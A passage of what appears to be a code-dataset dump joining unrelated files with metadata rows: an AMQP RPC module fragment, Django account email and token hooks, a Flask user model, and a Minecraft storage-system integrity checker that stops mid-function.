def declare_direct_consumer(self, topic, callback):
"""Create a 'direct' queue.
In nova's use, this is generally a msg_id queue used for
responses for call/multicall
"""
self.declare_consumer(DirectConsumer, topic, callback)
def declare_topic_consumer(self, topic, callback=None, queue_name=None,
exchange_name=None):
"""Create a 'topic' consumer."""
self.declare_consumer(functools.partial(TopicConsumer,
name=queue_name,
exchange_name=exchange_name,
),
topic, callback)
def declare_fanout_consumer(self, topic, callback):
"""Create a 'fanout' consumer."""
self.declare_consumer(FanoutConsumer, topic, callback)
def direct_send(self, msg_id, msg):
"""Send a 'direct' message."""
self.publisher_send(DirectPublisher, msg_id, msg)
def topic_send(self, topic, msg, timeout=None):
"""Send a 'topic' message."""
self.publisher_send(TopicPublisher, topic, msg, timeout)
def fanout_send(self, topic, msg):
"""Send a 'fanout' message."""
self.publisher_send(FanoutPublisher, topic, msg)
def notify_send(self, topic, msg, **kwargs):
"""Send a notify message on a topic."""
self.publisher_send(NotifyPublisher, topic, msg, None, **kwargs)
def consume(self, limit=None):
"""Consume from all queues/consumers."""
it = self.iterconsume(limit=limit)
while True:
try:
it.next()
except StopIteration:
return
def consume_in_thread(self):
"""Consumer from all queues/consumers in a greenthread."""
@excutils.forever_retry_uncaught_exceptions
def _consumer_thread():
try:
self.consume()
except greenlet.GreenletExit:
return
if self.consumer_thread is None:
self.consumer_thread = eventlet.spawn(_consumer_thread)
return self.consumer_thread
def create_consumer(self, topic, proxy, fanout=False):
"""Create a consumer that calls a method in a proxy object."""
proxy_cb = rpc_amqp.ProxyCallback(
self.conf, proxy,
rpc_amqp.get_connection_pool(self.conf, Connection))
self.proxy_callbacks.append(proxy_cb)
if fanout:
self.declare_fanout_consumer(topic, proxy_cb)
else:
self.declare_topic_consumer(topic, proxy_cb)
def create_worker(self, topic, proxy, pool_name):
"""Create a worker that calls a method in a proxy object."""
proxy_cb = rpc_amqp.ProxyCallback(
self.conf, proxy,
rpc_amqp.get_connection_pool(self.conf, Connection))
self.proxy_callbacks.append(proxy_cb)
self.declare_topic_consumer(topic, proxy_cb, pool_name)
def join_consumer_pool(self, callback, pool_name, topic,
exchange_name=None):
"""Register as a member of a group of consumers for a given topic from
the specified exchange.
Exactly one member of a given pool will receive each message.
A message will be delivered to multiple pools, if more than
one is created.
"""
callback_wrapper = rpc_amqp.CallbackWrapper(
conf=self.conf,
callback=callback,
connection_pool=rpc_amqp.get_connection_pool(self.conf,
Connection),
)
self.proxy_callbacks.append(callback_wrapper)
self.declare_topic_consumer(
queue_name=pool_name,
topic=topic,
exchange_name=exchange_name,
callback=callback_wrapper,
)
def create_connection(conf, new=True):
"""Create a connection."""
return rpc_amqp.create_connection(
conf, new,
rpc_amqp.get_connection_pool(conf, Connection))
def multicall(conf, context, topic, msg, timeout=None):
"""Make a call that returns multiple times."""
return rpc_amqp.multicall(
conf, context, topic, msg, timeout,
rpc_amqp.get_connection_pool(conf, Connection))
def call(conf, context, topic, msg, timeout=None):
"""Sends a message on a topic and wait for a response."""
return rpc_amqp.call(
conf, context, topic, msg, timeout,
rpc_amqp.get_connection_pool(conf, Connection))
def cast(conf, context, topic, msg):
"""Sends a message on a topic without waiting for a response."""
return rpc_amqp.cast(
conf, context, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection))
def fanout_cast(conf, context, topic, msg):
"""Sends a message on a fanout exchange without waiting for a response."""
return rpc_amqp.fanout_cast(
conf, context, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection))
def cast_to_server(conf, context, server_params, topic, msg):
"""Sends a message on a topic to a specific server."""
return rpc_amqp.cast_to_server(
conf, context, server_params, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection))
def fanout_cast_to_server(conf, context, server_params, topic, msg):
"""Sends a message on a fanout exchange to a specific server."""
return rpc_amqp.fanout_cast_to_server(
conf, context, server_params, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection))
def notify(conf, context, topic, msg, envelope):
"""Sends a notification event on a topic."""
return rpc_amqp.notify(
conf, context, topic, msg,
rpc_amqp.get_connection_pool(conf, Connection),
envelope)
def cleanup():
return rpc_amqp.cleanup(Connection.pool)
|
apache-2.0
| -1,269,175,068,643,578,600
| 37.124851
| 79
| 0.558993
| false
| 4.416391
| false
| false
| false
|
raytung/Slice
|
account/hooks.py
|
1
|
2621
|
import hashlib
import random
from django.core.mail import send_mail
from django.template.loader import render_to_string
from account.conf import settings
from django.contrib.auth.models import User
from django.core.exceptions import ObjectDoesNotExist
class AccountDefaultHookSet(object):
def send_invitation_email(self, to, ctx):
subject = render_to_string("account/email/invite_user_subject.txt", ctx)
message = render_to_string("account/email/invite_user.txt", ctx)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to)
def send_confirmation_email(self, to, ctx):
subject = render_to_string("account/email/email_confirmation_subject.txt", ctx)
subject = "".join(subject.splitlines()) # remove superfluous line breaks
message = render_to_string("account/email/email_confirmation_message.txt", ctx)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to)
def send_password_change_email(self, to, ctx):
subject = render_to_string("account/email/password_change_subject.txt", ctx)
subject = "".join(subject.splitlines())
message = render_to_string("account/email/password_change.txt", ctx)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to)
def send_password_reset_email(self, to, ctx):
subject = render_to_string("account/email/password_reset_subject.txt", ctx)
subject = "".join(subject.splitlines())
message = render_to_string("account/email/password_reset.txt", ctx)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, to)
def generate_random_token(self, extra=None, hash_func=hashlib.sha256):
if extra is None:
extra = []
bits = extra + [str(random.SystemRandom().getrandbits(512))]
return hash_func("".join(bits).encode("utf-8")).hexdigest()
def generate_signup_code_token(self, email=None):
return self.generate_random_token([email])
def generate_email_confirmation_token(self, email):
return self.generate_random_token([email])
def get_user_credentials(self, form, identifier_field):
try:
username = User.objects.get(email=form.cleaned_data[identifier_field])
username = username.username
except ObjectDoesNotExist:
username = form.cleaned_data[identifier_field]
return {
"username": username,
"password": form.cleaned_data["password"],
}
class HookProxy(object):
def __getattr__(self, attr):
return getattr(settings.ACCOUNT_HOOKSET, attr)
hookset = HookProxy()
|
mit
| -1,658,567,781,542,435,800
| 38.119403
| 87
| 0.679893
| false
| 3.917788
| false
| false
| false
|
anselal/antminer-monitor
|
antminermonitor/blueprints/user/models.py
|
1
|
1102
|
from flask_login.mixins import UserMixin
from werkzeug.security import generate_password_hash, check_password_hash
from sqlalchemy import Column, Integer, VARCHAR
from antminermonitor.database import Base
class User(UserMixin, Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
username = Column(VARCHAR(64), index=True, unique=True)
email = Column(VARCHAR(120), index=True, unique=True)
password_hash = Column(VARCHAR(128))
surname = Column(VARCHAR(100))
firstname = Column(VARCHAR(100))
active = Column(Integer, default=1)
@property
def serialize(self):
return {
'id': self.id,
'username': self.username,
'firstname': self.firstname,
'surname': self.surname,
'email': self.email
}
def __repr__(self):
return '<User {}>'.format(self.username)
def set_password(self, password):
self.password_hash = generate_password_hash(password)
def check_password(self, password):
return check_password_hash(self.password_hash, password)
|
gpl-3.0
| 8,158,068,241,093,129,000
| 30.485714
| 73
| 0.653358
| false
| 3.978339
| false
| false
| false
|
wurstmineberg/alltheitems.wurstmineberg.de
|
alltheitems/cloud.py
|
1
|
67724
|
import alltheitems.__main__ as ati
import bottle
import collections
import contextlib
import datetime
import itertools
import json
import pathlib
import random
import re
import xml.sax.saxutils
import alltheitems.item
import alltheitems.util
import alltheitems.world
class FillLevel:
def __init__(self, stack_size, total_items, max_slots, *, is_smart_chest=True):
self.stack_size = stack_size
self.total_items = total_items
self.max_slots = max_slots
self.is_smart_chest = is_smart_chest
def __str__(self):
if self.total_items == 0:
return '{} is empty.'.format('SmartChest' if self.is_smart_chest else 'Chest')
elif self.total_items == self.max_items:
return '{} is full.'.format('SmartChest' if self.is_smart_chest else 'Chest')
else:
stacks, items = self.stacks
return '{} is filled {}% ({} {stack}{}{} out of {} {stack}s).'.format('SmartChest' if self.is_smart_chest else 'Chest', int(100 * self.fraction), stacks, '' if stacks == 1 else 's', ' and {} item{}'.format(items, '' if items == 1 else 's') if items > 0 else '', self.max_slots, stack='item' if self.stack_size == 1 else 'stack')
@property
def fraction(self):
return self.total_items / self.max_items
def is_empty(self):
return self.total_items == 0
def is_full(self):
return self.total_items == self.max_items
@property
def max_items(self):
return self.max_slots * self.stack_size
@property
def stacks(self):
return divmod(self.total_items, self.stack_size)
CONTAINERS = [ # layer coords of all counted container blocks in a SmartChest
(3, -7, 3),
(3, -7, 4),
(4, -7, 4),
(5, -7, 3),
(5, -7, 4),
(2, -6, 3),
(3, -6, 2),
(3, -6, 3),
(2, -5, 2),
(2, -5, 3),
(3, -5, 3),
(2, -4, 3),
(3, -4, 2),
(3, -4, 3),
(3, -3, 2),
(4, -3, 2),
(5, -3, 2),
(6, -3, 2),
(5, -2, 2),
(6, -2, 2),
(5, 0, 2),
(5, 0, 3)
]
STONE_VARIANTS = {
0: 'stone',
1: 'granite',
2: 'polished granite',
3: 'diorite',
4: 'polished diorite',
5: 'andesite',
6: 'polished andesite'
}
HOPPER_FACINGS = {
0: 'down',
1: 'up', #for droppers
2: 'north',
3: 'south',
4: 'west',
5: 'east'
}
TORCH_FACINGS = {
1: 'to its west',
2: 'to its east',
3: 'to its north',
4: 'to its south',
5: 'below'
}
HTML_COLORS = {
'cyan': '#0ff',
'cyan2': '#0ff',
'gray': '#777',
'red': '#f00',
'orange': '#f70',
'yellow': '#ff0',
'white': '#fff',
'white2': '#fff',
None: 'transparent'
}
def hopper_chain_connected(start_coords, end_coords, *, world=None, chunk_cache=None, block_at=None):
if world is None:
world = alltheitems.world.World()
if chunk_cache is None:
chunk_cache = {}
if block_at is None:
block_at=world.block_at
visited_coords = set()
x, y, z = start_coords
while (x, y, z) != end_coords:
if (x, y, z) in visited_coords:
return False, 'hopper chain points into itself at {} {} {}'.format(x, y, z)
visited_coords.add((x, y, z))
block = block_at(x, y, z, chunk_cache=chunk_cache)
if block['id'] != 'minecraft:hopper':
return False, 'block at {} {} {} is not a <a href="/block/minecraft/hopper">hopper</a>'.format(x, y, z, *end_coords)
if block['damage'] & 0x7 == 0:
y -= 1 # down
elif block['damage'] & 0x7 == 2:
z -= 1 # north
elif block['damage'] & 0x7 == 3:
z += 1 # south
elif block['damage'] & 0x7 == 4:
x -= 1 # west
elif block['damage'] & 0x7 == 5:
x += 1 # east
else:
raise ValueError('Unknown hopper facing {} at {}'.format(block['damage'] & 0x7, (x, y, z)))
return True, None
def smart_chest_schematic(document_root=ati.document_root):
layers = {}
with (document_root / 'static' / 'smartchest.txt').open() as smart_chest_layers:
current_y = None
current_layer = None
for line in smart_chest_layers:
if line == '\n':
continue
match = re.fullmatch('layer (-?[0-9]+)\n', line)
if match:
# new layer
if current_y is not None:
layers[current_y] = current_layer
current_y = int(match.group(1))
current_layer = []
else:
current_layer.append(line.rstrip('\r\n'))
if current_y is not None:
layers[current_y] = current_layer
return sorted(layers.items())
def chest_iter():
"""Returns an iterator yielding tuples (x, corridor, y, floor, z, chest)."""
with (ati.assets_root / 'json' / 'cloud.json').open() as cloud_json:
cloud_data = json.load(cloud_json)
for y, floor in enumerate(cloud_data):
for x, corridor in sorted(((int(x), corridor) for x, corridor in floor.items()), key=lambda tup: tup[0]):
for z, chest in enumerate(corridor):
yield x, corridor, y, floor, z, chest
def chest_coords(item, *, include_meta=False):
if not isinstance(item, alltheitems.item.Item):
item = alltheitems.item.Item(item)
for x, corridor, y, _, z, chest in chest_iter():
if item == chest:
if include_meta:
return (x, y, z), len(corridor), None if isinstance(chest, str) else chest.get('name'), None if isinstance(chest, str) else chest.get('sorter')
else:
return x, y, z
if include_meta:
return None, 0, None, None
def global_error_checks(*, chunk_cache=None, block_at=alltheitems.world.World().block_at):
cache_path = ati.cache_root / 'cloud-globals.json'
max_age = datetime.timedelta(hours=1, minutes=random.randrange(0, 60)) # use a random value between 1 and 2 hours for the cache expiration
if cache_path.exists() and datetime.datetime.utcfromtimestamp(cache_path.stat().st_mtime) > datetime.datetime.utcnow() - max_age:
# cached check results are recent enough
with cache_path.open() as cache_f:
cache = json.load(cache_f)
return cache
# cached check results are too old, recheck
if chunk_cache is None:
chunk_cache = {}
# error check: input hopper chain
start = 14, 61, 32 # the first hopper after the buffer elevator
end = -1, 25, 52 # the half of the uppermost overflow chest into which the hopper chain is pointing
is_connected, message = hopper_chain_connected(start, end, chunk_cache=chunk_cache, block_at=block_at)
if not is_connected:
return 'Input hopper chain at {} is not connected to the unsorted overflow at {}: {}.'.format(start, end, message)
if ati.cache_root.exists():
with cache_path.open('w') as cache_f:
json.dump(message, cache_f, sort_keys=True, indent=4)
def chest_error_checks(x, y, z, base_x, base_y, base_z, item, item_name, exists, stackable, durability, has_smart_chest, has_sorter, has_overflow, filler_item, sorting_hopper, missing_overflow_hoppers, north_half, south_half, corridor_length, pre_sorter, layer_coords, block_at, items_data, chunk_cache, document_root):
if stackable and has_sorter:
# error check: overflow exists
if not has_overflow:
if len(missing_overflow_hoppers) == 3:
return 'Missing overflow hoppers.'
elif len(missing_overflow_hoppers) > 1:
return 'Overflow hoppers at x={} do not exist.'.format(missing_overflow_hoppers)
elif len(missing_overflow_hoppers) == 1:
return 'Overflow hopper at x={} does not exist, is {}.'.format(next(iter(missing_overflow_hoppers)), block_at(next(iter(missing_overflow_hoppers)), base_y - 7, base_z - 1)['id'])
else:
return 'Missing overflow.'
# error check: pre-sorter for lower floors
if y > 4:
if pre_sorter is None:
return 'Preliminary sorter coordinate missing from cloud.json.'
pre_sorting_hopper = block_at(pre_sorter, 30, 52, chunk_cache=chunk_cache)
if pre_sorting_hopper['id'] != 'minecraft:hopper':
return 'Preliminary sorter is missing (should be at {} 30 52).'.format(pre_sorter)
if pre_sorting_hopper['damage'] != 3:
return 'Preliminary sorting hopper ({} 30 52) should be pointing south, but is facing {}.'.format(pre_sorter, HOPPER_FACINGS[pre_sorting_hopper['damage']])
empty_slots = set(range(5))
for slot in pre_sorting_hopper['tileEntity']['Items']:
empty_slots.remove(slot['Slot'])
if slot['Slot'] == 0:
if not item.matches_slot(slot):
return 'Preliminary sorting hopper is sorting the wrong item: {}.'.format(alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
else:
if not filler_item.matches_slot(slot):
return 'Preliminary sorting hopper has wrong filler item in slot {}: {} (should be {}).'.format(slot['Slot'], alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text(), filler_item.link_text())
if slot['Count'] > 1:
return 'Preliminary sorting hopper: too much {} in slot {}.'.format(filler_item.link_text(), slot['Slot'])
if len(empty_slots) > 0:
if len(empty_slots) == 5:
return 'Preliminary sorting hopper is empty.'
elif len(empty_slots) == 1:
return 'Slot {} of the preliminary sorting hopper is empty.'.format(next(iter(empty_slots)))
else:
return 'Some slots in the preliminary sorting hopper are empty: {}.'.format(alltheitems.util.join(empty_slots))
if has_sorter:
# error check: sorting hopper
if sorting_hopper['damage'] != 2:
return 'Sorting hopper ({} {} {}) should be pointing north, but is facing {}.'.format(base_x - 2 if z % 2 == 0 else base_x + 2, base_y - 3, base_z, HOPPER_FACINGS[sorting_hopper['damage']])
empty_slots = set(range(5))
for slot in sorting_hopper['tileEntity']['Items']:
empty_slots.remove(slot['Slot'])
if slot['Slot'] == 0 and stackable:
if not item.matches_slot(slot) and not filler_item.matches_slot(slot):
return 'Sorting hopper is sorting the wrong item: {}.'.format(alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
else:
if not filler_item.matches_slot(slot):
return 'Sorting hopper has wrong filler item in slot {}: {} (should be {}).'.format(slot['Slot'], alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text(), filler_item.link_text())
if slot['Count'] > 1:
return 'Sorting hopper: too much {} in slot {}.'.format(filler_item.link_text(), slot['Slot'])
if len(empty_slots) > 0:
if len(empty_slots) == 5:
return 'Sorting hopper is empty.'
elif len(empty_slots) == 1:
return 'Slot {} of the sorting hopper is empty.'.format(next(iter(empty_slots)))
else:
return 'Some slots in the sorting hopper are empty: {}.'.format(alltheitems.util.join(empty_slots))
if exists:
# error check: wrong items in access chest
for slot in itertools.chain(north_half['tileEntity']['Items'], south_half['tileEntity']['Items']):
if not item.matches_slot(slot):
return 'Access chest contains items of the wrong kind: {}.'.format(alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
# error check: wrong name on sign
sign = block_at(base_x - 1 if z % 2 == 0 else base_x + 1, base_y + 1, base_z + 1, chunk_cache=chunk_cache)
if sign['id'] != 'minecraft:wall_sign':
return 'Sign is missing.'
text = []
for line in range(1, 5):
line_text = json.loads(sign['tileEntity']['Text{}'.format(line)])['text'].translate(dict.fromkeys(range(0xf700, 0xf704), None))
if len(line_text) > 0:
text.append(line_text)
text = ' '.join(text)
if text != item_name.translate({0x2161: 'II'}):
return 'Sign has wrong text: should be {!r}, is {!r}.'.format(xml.sax.saxutils.escape(item_name), xml.sax.saxutils.escape(text))
if has_overflow:
# error check: overflow hopper chain
start = base_x + 5 if z % 2 == 0 else base_x - 5, base_y - 7, base_z - 1
end = -35, 6, 38 # position of the dropper leading into the Smelting Center's item elevator
is_connected, message = hopper_chain_connected(start, end, chunk_cache=chunk_cache, block_at=block_at)
if not is_connected:
return 'Overflow hopper chain at {} is not connected to the Smelting Center item elevator at {}: {}.'.format(start, end, message)
if exists and has_smart_chest:
# error check: all blocks
for layer_y, layer in smart_chest_schematic(document_root=document_root):
for layer_x, row in enumerate(layer):
for layer_z, block_symbol in enumerate(row):
# determine the coordinate of the current block
exact_x, exact_y, exact_z = layer_coords(layer_x, layer_y, layer_z)
# determine current block
block = block_at(exact_x, exact_y, exact_z, chunk_cache=chunk_cache)
# check against schematic
if block_symbol == ' ':
# air
if block['id'] != 'minecraft:air':
return 'Block at {} {} {} should be air, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == '!':
# sign
if block['id'] != 'minecraft:wall_sign':
return 'Block at {} {} {} should be a sign, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != (4 if z % 2 == 0 else 5):
return 'Sign at {} {} {} is facing the wrong way.'.format(exact_x, exact_y, exact_z)
elif block_symbol == '#':
# chest
if block['id'] != 'minecraft:chest':
return 'Block at {} {} {} should be a chest, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage chest at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == '<':
# hopper facing south
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 3: # south
return 'Hopper at {} {} {} should be pointing south, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(5, -7, 4),
(6, -5, 4)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == '>':
# hopper facing north
if layer_y == -7 and layer_x == 0 and z < 8:
# the first few chests get ignored because their overflow points in the opposite direction
pass #TODO introduce special checks for them
else:
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 2: # north
return 'Hopper at {} {} {} should be pointing north, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
storage_hoppers = {
(3, -7, 3),
(3, -4, 2)
}
if (layer_x, layer_y, layer_z) in storage_hoppers:
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Storage hopper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == '?':
# any block
pass
elif block_symbol == 'C':
# comparator
if block['id'] != 'minecraft:unpowered_comparator':
return 'Block at {} {} {} should be a comparator, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
known_facings = {
(5, -7, 2): 0x2, # south
(5, -5, 2): 0x2, # south
(7, -3, 4): 0x0, # north
(0, -1, 1): 0x0, # north
(1, -1, 2): 0x0, # north
(2, 0, 2): 0x1 if z % 2 == 0 else 0x3, # east / west
(2, 0, 3): 0x2, # south
(4, 0, 2): 0x1 if z % 2 == 0 else 0x3, # east / west
(4, 0, 3): 0x2 # south
}
facing = block['damage'] & 0x3
if (layer_x, layer_y, layer_z) in known_facings:
if known_facings[layer_x, layer_y, layer_z] != facing:
return 'Comparator at {} {} {} is facing the wrong way.'.format(exact_x, exact_y, exact_z)
else:
return 'Direction check for comparator at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
known_modes = {
(5, -7, 2): False, # compare
(5, -5, 2): False, # compare
(7, -3, 4): False, # compare
(0, -1, 1): False, # compare
(1, -1, 2): True, # subtract
(2, 0, 2): True, # subtract
(2, 0, 3): False, # compare
(4, 0, 2): True, #subtract
(4, 0, 3): False # compare
}
mode = (block['damage'] & 0x4) == 0x4
if (layer_x, layer_y, layer_z) in known_modes:
if known_modes[layer_x, layer_y, layer_z] != mode:
return 'Comparator at {} {} {} is in {} mode, should be in {} mode.'.format(exact_x, exact_y, exact_z, 'subtraction' if mode else 'comparison', 'subtraction' if known_modes[layer_x, layer_y, layer_z] else 'comparison')
else:
return 'Mode check for comparator at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
elif block_symbol == 'D':
# dropper facing up
if block['id'] != 'minecraft:dropper':
return 'Block at {} {} {} should be a dropper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 1: # up
return 'Dropper at {} {} {} should be facing up, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
for slot in block['tileEntity']['Items']:
if not item.matches_slot(slot):
return 'Dropper at {} {} {} contains items of the wrong kind: {}.'.format(exact_x, exact_y, exact_z, alltheitems.item.Item.from_slot(slot, items_data=items_data).link_text())
elif block_symbol == 'F':
# furnace
if layer_y == -6 and layer_x == 0 and z < 2:
# the first few chests get ignored because their overflow points in the opposite direction
pass #TODO introduce special checks for them
elif layer_y == -1 and layer_x == 7 and layer_z == 1 and (z == corridor_length - 1 or z == corridor_length - 2 and z % 2 == 0):
# the floor ends with a quartz slab instead of a furnace here
if block['id'] != 'minecraft:stone_slab':
return 'Block at {} {} {} should be a quartz slab, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 0x7:
slab_variant = {
0: 'stone',
1: 'sandstone',
2: 'fake wood',
3: 'cobblestone',
4: 'brick',
5: 'stone brick',
6: 'Nether brick',
7: 'quartz'
}[block['damage'] & 0x7]
return 'Block at {} {} {} should be a <a href="/block/minecraft/stone_slab/7">quartz slab</a>, is a <a href="/block/minecraft/stone_slab/{}">{} slab</a>.'.format(exact_x, exact_y, exact_z, block['damage'] & 0x7, slab_variant)
if block['damage'] & 0x8 != 0x8:
return 'Quartz slab at {} {} {} should be a top slab, is a bottom slab.'.format(exact_x, exact_y, exact_z)
elif x == 0 and y == 6 and layer_y == -1 and layer_x == 7:
# the central corridor on the 6th floor uses stone bricks instead of furnaces for the floor
if block['id'] != 'minecraft:stonebrick':
return 'Block at {} {} {} should be stone bricks, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] != 0:
stonebrick_variant = {
0: 'regular',
1: 'mossy',
2: 'cracked',
3: 'chiseled'
}[block['damage']]
return 'Block at {} {} {} should be <a href="/block/minecraft/stonebrick/0">regular stone bricks</a>, is <a href="/block/minecraft/stonebrick/{}">{} stone bricks</a>.'.format(exact_x, exact_y, exact_z, block['damage'], stonebrick_variant)
else:
if block['id'] != 'minecraft:furnace':
return 'Block at {} {} {} should be a furnace, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
known_signals = {
(0, -6, 4): 0,
(0, -6, 5): 0,
(0, -6, 6): 0,
(0, -6, 7): 0,
(0, -1, 0): 8,
(7, -1, 1): 0,
(7, -1, 2): 0,
(7, -1, 3): 0,
(7, -1, 4): 0,
(2, 0, 4): 1,
(4, 0, 4): 5
}
signal = alltheitems.item.comparator_signal(block, items_data=items_data)
if (layer_x, layer_y, layer_z) in known_signals:
if known_signals[layer_x, layer_y, layer_z] != signal:
return 'Furnace at {} {} {} has a fill level of {}, should be {}.'.format(exact_x, exact_y, exact_z, signal, known_signals[layer_x, layer_y, layer_z])
else:
return 'Fill level check for furnace at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
elif block_symbol == 'G':
# glowstone
if block['id'] != 'minecraft:glowstone':
return 'Block at {} {} {} should be glowstone, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 'H':
# hopper, any facing
if block['id'] != 'minecraft:hopper':
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 'N':
# overflow hopper chain pointing north
if y > 1 and (z == 0 or z == 1):
if block['id'] == 'minecraft:hopper':
if block['damage'] != 2: # north
return 'Overflow hopper at {} {} {} should be pointing north, is {}.'.format(exact_x, exact_y, exact_z, HOPPER_FACINGS[block['damage']])
elif block['id'] == 'minecraft:air':
pass # also allow air because some overflow hopper chains don't start on the first floor
else:
return 'Block at {} {} {} should be a hopper, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
else:
if block['id'] != 'minecraft:air':
return 'Block at {} {} {} should be air, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
elif block_symbol == 'P':
# upside-down oak stairs
if block['id'] != 'minecraft:oak_stairs':
return 'Block at {} {} {} should be oak stairs, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x3 != (0x1 if z % 2 == 0 else 0x0):
stairs_facings = {
0: 'west',
1: 'east',
2: 'south',
3: 'north'
}
return 'Stairs at {} {} {} should be facing {}, is {}.'.format(exact_x, exact_y, exact_z, stairs_facings[0x1 if z % 2 == 0 else 0x0], stairs_facings[block['damage'] & 0x3])
if block['damage'] & 0x4 != 0x4:
return 'Stairs at {} {} {} should be upside-down.'.format(exact_x, exact_y, exact_z)
elif block_symbol == 'Q':
# quartz top slab
if block['id'] != 'minecraft:stone_slab':
return 'Block at {} {} {} should be a quartz slab, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 0x7:
slab_variant = {
0: 'stone',
1: 'sandstone',
2: 'fake wood',
3: 'cobblestone',
4: 'brick',
5: 'stone brick',
6: 'Nether brick',
7: 'quartz'
}[block['damage'] & 0x7]
return 'Block at {} {} {} should be a <a href="/block/minecraft/stone_slab/7">quartz slab</a>, is a <a href="/block/minecraft/stone_slab/{}">{} slab</a>.'.format(exact_x, exact_y, exact_z, block['damage'] & 0x7, slab_variant)
if block['damage'] & 0x8 != 0x8:
return 'Quartz slab at {} {} {} should be a top slab, is a bottom slab.'.format(exact_x, exact_y, exact_z)
elif block_symbol == 'R':
# repeater
if block['id'] not in ('minecraft:unpowered_repeater', 'minecraft:powered_repeater'):
return 'Block at {} {} {} should be a repeater, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
known_facings = {
(1, -8, 2): 0x0, # north
(3, -8, 3): 0x3 if z % 2 == 0 else 0x1, # west / east
(6, -6, 2): 0x0, # north
(7, -5, 5): 0x2, # south
(3, -3, 1): 0x1 if z % 2 == 0 else 0x3 # east / west
}
facing = block['damage'] & 0x3
if (layer_x, layer_y, layer_z) in known_facings:
if known_facings[layer_x, layer_y, layer_z] != facing:
return 'Repeater at {} {} {} is facing the wrong way.'.format(exact_x, exact_y, exact_z)
else:
return 'Direction check for repeater at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
known_delays = { # in game ticks
(1, -8, 2): 4,
(3, -8, 3): 2,
(6, -6, 2): 2,
(7, -5, 5): 2,
(3, -3, 1): 2
}
delay_ticks = 2 * (block['damage'] >> 2) + 2
if (layer_x, layer_y, layer_z) in known_delays:
if known_delays[layer_x, layer_y, layer_z] != delay_ticks:
return 'Repeater at {} {} {} has a delay of {} game tick{}, should be {}.'.format(exact_x, exact_y, exact_z, delay_ticks, '' if delay_ticks == 1 else 's', known_delays[layer_x, layer_y, layer_z])
else:
return 'Delay check for repeater at {} {} {} (relative coords: {} {} {}) not yet implemented.'.format(exact_x, exact_y, exact_z, layer_x, layer_y, layer_z)
elif block_symbol == 'S':
# stone top slab
if block['id'] != 'minecraft:stone_slab':
return 'Block at {} {} {} should be a stone slab, is {}.'.format(exact_x, exact_y, exact_z, block['id'])
if block['damage'] & 0x7 != 0x0:
slab_variant = {
0: 'stone',
1: 'sandstone',
2: 'fake wood',
3: 'cobblestone',
4: 'brick',
5: 'stone brick',
6: 'Nether brick',
7: 'quartz'
}[block['damage'] & 0x7]
return 'Block at {} {} {} should be a <a href="/block/minecraft/stone_slab/0">stone slab</a>, is a <a href="/block/minecraft/stone_slab/{}">{} slab</a>.'.format(exact_x, exact_y, exact_z, block['damage'] & 0x7, slab_variant)
if block['damage'] & 0x8 != 0x8:
return 'Quartz slab at {} {} {} should be a top slab.'.format(exact_x, exact_y, exact_z)
elif block_symbol == 'T':
# redstone torch attached to the side of a block
if block['id'] not in ('minecraft:unlit_redstone_torch', 'minecraft:redstone_torch'):
